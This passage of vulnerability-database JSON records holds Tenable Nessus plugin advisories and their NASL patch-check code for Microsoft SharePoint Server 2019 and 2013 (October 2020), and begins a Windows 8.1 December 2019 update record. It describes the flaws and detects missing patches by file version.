application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "title": "Security Updates for Microsoft SharePoint Server 2019 (October 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16941", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16950", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/141419", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141419);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/13\");\n\n script_cve_id(\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16950\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486676\");\n script_xref(name:\"MSFT\", value:\"MS20-4486676\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2019 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2019 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2019 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16950, CVE-2020-16953)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486676\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4486676 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16952\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486676'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2019':\n { '0':\n {'Server':\n [{\n 'kb' : '4486676',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'ascalc.dll',\n 'version' : '16.0.10367.20000',\n 'product_name' : 'Microsoft SharePoint Server 2019'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if (check['kb'] == '4486676') xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-05T13:51:19", "description": "The Microsoft SharePoint Server 2013 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft Excel software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the current user. If\n the current user is logged on with administrative user\n rights, an attacker could take control of the affected\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-16929)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "title": "Security Updates for Microsoft SharePoint Server 2013 (October 2020)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16941", "CVE-2020-16951", "CVE-2020-16945", "CVE-2020-16942", "CVE-2020-16953", "CVE-2020-16948", "CVE-2020-16946", "CVE-2020-16944", "CVE-2020-16929", "CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_server", "cpe:/a:microsoft:sharepoint", "cpe:/a:microsoft:sharepoint_foundation"], "id": "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "href": "https://www.tenable.com/plugins/nessus/141425", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141425);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/04\");\n\n script_cve_id(\n \"CVE-2020-16929\",\n \"CVE-2020-16941\",\n \"CVE-2020-16942\",\n \"CVE-2020-16944\",\n \"CVE-2020-16945\",\n \"CVE-2020-16946\",\n \"CVE-2020-16948\",\n \"CVE-2020-16951\",\n \"CVE-2020-16952\",\n \"CVE-2020-16953\"\n );\n script_xref(name:\"MSKB\", value:\"4486687\");\n script_xref(name:\"MSKB\", value:\"4486694\");\n script_xref(name:\"MSFT\", value:\"MS20-4486687\");\n script_xref(name:\"MSFT\", value:\"MS20-4486694\");\n script_xref(name:\"IAVA\", value:\"2020-A-0460-S\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server 2013 (October 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server 2013 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server 2013 installation on the\nremote host is missing security updates. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2020-16948,\n CVE-2020-16953)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-16945,\n CVE-2020-16946)\n\n - An information disclosure vulnerability exists when\n Microsoft SharePoint Server improperly discloses its\n folder structure when rendering specific web pages. An\n attacker who took advantage of this information\n disclosure could view the folder path of scripts loaded\n on the page. To take advantage of the vulnerability, an\n attacker would require access to the specific SharePoint\n page affected by this vulnerability. The security update\n addresses the vulnerability by correcting how scripts\n are referenced on some SharePoint pages.\n (CVE-2020-16941, CVE-2020-16942)\n\n - A remote code execution vulnerability exists in\n Microsoft Excel software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the current user. If\n the current user is logged on with administrative user\n rights, an attacker could take control of the affected\n system. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-16929)\n\n - A remote code execution vulnerability exists in\n Microsoft SharePoint when the software fails to check\n the source markup of an application package. An attacker\n who successfully exploited the vulnerability could run\n arbitrary code in the context of the SharePoint\n application pool and the SharePoint server farm account.\n Exploitation of this vulnerability requires that a user\n uploads a specially crafted SharePoint application\n package to an affected version of SharePoint. The\n security update addresses the vulnerability by\n correcting how SharePoint checks the source markup of\n application packages. (CVE-2020-16951, CVE-2020-16952)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-16944)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4486694\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4486687\n -KB4486694\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16929\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft SharePoint Server-Side Include and ViewState RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-10';\n\nkbs = make_list(\n '4486687',\n '4486694'\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2013':\n { '1':\n {'Foundation':\n [{\n 'kb' : '4486694',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\15\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '15.0.5285.1000',\n 'product_name' : 'Microsoft SharePoint Foundation Server 2013 SP1'\n }],\n 'Server':\n [{ \n 'kb' : '4486687',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'xlsrv.dll',\n 'version' : '15.0.5285.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2013 SP1'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\n\n# grab the path otherwise\nforeach check (param_list)\n{\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if ( check['kb'] == '4486694' || \n check['kb'] == 'xx' || \n check['kb'] == 'xx' \n ) xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T10:36:55", "description": "The remote Windows host is missing security update 4530730\nor cumulative update 4530702. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530730: Windows 8.1 and Windows Server 2012 R2 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530702.NASL", "href": "https://www.tenable.com/plugins/nessus/131930", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131930);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530702\");\n script_xref(name:\"MSKB\", value:\"4530730\");\n script_xref(name:\"MSFT\", value:\"MS19-4530702\");\n script_xref(name:\"MSFT\", value:\"MS19-4530730\");\n\n script_name(english:\"KB4530730: Windows 8.1 and Windows Server 2012 R2 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530730\nor cumulative update 4530702. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n 